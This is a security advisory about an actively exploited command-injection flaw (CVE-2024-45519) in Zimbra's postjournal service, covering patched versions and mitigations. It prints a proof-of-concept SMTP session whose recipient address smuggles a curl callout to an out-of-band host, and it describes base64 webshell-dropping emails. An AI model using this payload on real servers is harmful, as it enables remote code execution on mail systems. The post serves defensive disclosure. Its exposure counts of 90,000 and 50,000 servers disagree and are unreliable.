Zimbra Remote Code Execution Vulnerability Under Active Attack

As Zimbra is already a popular target for threat actors, users are urged to patch the postjournal vulnerability as soon as possible.

October 3, 2024 · 3 min read

Key Takeaways

  • A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.
  • A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.
  • The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.

Overview

A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.

The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.

Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.

The fix is included in the following versions and newer:

  • 9.0.0 Patch 41
  • 10.0.9
  • 10.1.1
  • 8.8.15 Patch 46

One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.

Technical Analysis

Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.


The researchers reverse-engineered the postjournal binary and found that it made no calls to execvp or to the run_command function. Instead, the read_maps function called popen directly, passing input through without sanitization. Wrapping the cmd argument passed to popen in double quotes blocks command injection with simple shell metacharacters, but because the shell still performs command substitution inside double quotes, that control could be bypassed with $() syntax.

The postjournal service was then exploited via port 10027 with the following SMTP commands:

    EHLO localhost
    MAIL FROM: <[email protected]>
    RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>
    DATA
    Test message
    .

The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:

    zmlocalconfig -e postjournal_enabled=true
    zmcontrol restart

The researchers also found that the default mynetworks configuration included a /20 CIDR range around their public IP address, so the exploit could be performed remotely if the postjournal service is enabled and the attacker is within that allowed network range.

Proofpoint researchers have observed the vulnerability under exploitation, with spoofed emails whose CC fields contain fake addresses crafted so that Zimbra servers parse and execute them as commands. The addresses contain base64 strings that are decoded and executed with the sh utility.

Some of the emails used CC'd addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and when the pieces are concatenated, the base64 blobs decode to a command that writes a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).

[Image: Base64 Zimbra email exploit]

Once installed, the webshell listens for inbound connections and supports command execution via exec, as well as download-and-execute over a socket connection.

Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:

CVE ID          Vendor  Product                     Vulnerability Name
CVE-2023-37580  Zimbra  Collaboration (ZCS)         Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-27926  Zimbra  Collaboration (ZCS)         Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-41352  Zimbra  Collaboration (ZCS)         Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-27925  Zimbra  Collaboration (ZCS)         Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-37042  Zimbra  Collaboration (ZCS)         Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability
CVE-2022-27924  Zimbra  Collaboration (ZCS)         Zimbra Collaboration (ZCS) Command Injection Vulnerability
CVE-2018-6882   Zimbra  Collaboration Suite (ZCS)   Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-24682  Zimbra  Webmail                     Zimbra Webmail Cross-Site Scripting Vulnerability

While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.

Recommendations

All Zimbra administrators should:

  • Disable postjournal if not needed
  • Configure mynetworks to prevent unauthorized access
  • Apply the latest security updates directly from Zimbra
